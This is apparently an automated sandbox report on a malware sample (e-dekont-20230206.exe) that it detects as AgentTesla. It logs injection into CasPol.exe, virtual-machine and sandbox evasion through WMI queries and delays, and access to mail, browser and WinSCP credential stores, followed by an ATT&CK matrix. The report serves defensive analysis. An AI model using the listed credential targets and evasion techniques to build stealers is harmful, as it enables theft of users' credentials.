        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\e-dekont-20230206.exe TID: 2216Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5604Thread sleep count: 9564 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -18446744073709540s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1200000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199781s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199422s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199297s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199167s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1199015s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198906s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198797s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198531s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198404s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198279s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198171s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1198041s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197921s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197813s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197496s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197390s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197264s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197156s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1197031s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196922s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196813s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196641s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196510s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196406s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196288s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196171s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1196063s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195953s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195844s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195703s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195593s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195484s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195374s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195265s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195155s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1195042s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194922s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194812s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194703s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194593s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194483s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194375s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5584Thread sleep time: -1194263s >= -30000s
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199781
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199422
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199297
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199167
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199015
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198906
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198797
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198531
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198279
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198171
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198041
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197921
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197813
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197496
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197264
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197156
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197031
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196922
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196813
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196510
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196406
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196288
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196171
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196063
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195844
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195593
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195484
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195374
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195265
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195155
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195042
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194922
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194593
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194483
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194375
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194263
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9564
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1200000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199781
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199422
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199297
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199167
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1199015
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198906
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198797
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198531
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198404
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198279
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198171
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1198041
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197921
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197813
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197496
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197390
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197264
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197156
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1197031
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196922
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196813
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196641
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196510
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196406
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196288
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196171
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1196063
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195953
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195844
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195593
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195484
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195374
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195265
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195155
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1195042
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194922
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194812
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194703
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194593
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194483
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194375
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 1194263
        Source: CasPol.exe, 00000001.00000002.560208417.0000000006252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42C000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 42E000
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F20008
        Allocates memory in foreign processes
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeQueries volume information: C:\Users\user\Desktop\e-dekont-20230206.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 2256, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation        		Path Interception311
        Process Injection        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		114
        System Information Discovery        		Remote Services11
        Archive Collected Data        		Exfiltration Over Other Network Medium3
        Ingress Tool Transfer        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Deobfuscate/Decode Files or Information        		21
        Input Capture        		111
        Security Software Discovery        		Remote Desktop Protocol1
        Data from Local System        		Exfiltration Over Bluetooth11
        Encrypted Channel        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information        		1
        Credentials in Registry        		131
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares1
        Email Collection        		Automated Exfiltration4
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
        Software Packing        		NTDS1
        Application Window Discovery        		Distributed Component Object Model21
        Input Capture        		Scheduled Transfer15
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Timestomp        		LSA Secrets1
        Remote System Discovery        		SSH1
        Clipboard Data        		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Masquerading        		Cached Domain Credentials1
        System Network Configuration Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items131
        Virtualization/Sandbox Evasion        		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job311
